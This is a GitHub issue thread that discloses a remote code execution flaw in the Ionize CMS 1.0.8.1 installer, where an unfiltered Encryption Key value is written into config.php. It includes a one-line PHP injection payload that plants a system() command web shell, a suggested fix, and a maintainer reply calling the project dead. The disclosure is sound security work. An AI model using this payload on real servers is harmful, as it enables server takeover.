RCE exists in Ionize-V1.0.8.1 'install/class/Installer.php' file #L1035

[0verf1ow]

The "Encryption Key" parameter of the installation page uri "/install/?step=user&lang=en" is not strictly filtered, and any string can be written to the "application/config/config.php" file, resulting in arbitrary code execution.

Vulnerability reason

write configuration file directly without filtering

Where the vulnerability occurs: https://github.com/ionize/ionize/blob/master/install/class/Installer.php#L1035

Vulnerability Demo

When installing to user settings, the value of the Encryption Key will be written to the configuration file "application/config/config.php"

payload:

111111111111111111111111';system($_GET['cmd']);//

Enter payload to submit

Ok, the payload has been successfully written into

try command execution

Bugfix

Only letters and numbers are allowed, no other characters are allowed

[partikule]

Thanks. Ionize is a dead project since around 2017…

…

Le 31 mars 2022 à 17:10, 0verf1ow ***@***.***> a écrit :  Closed #403. — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you are subscribed to this thread.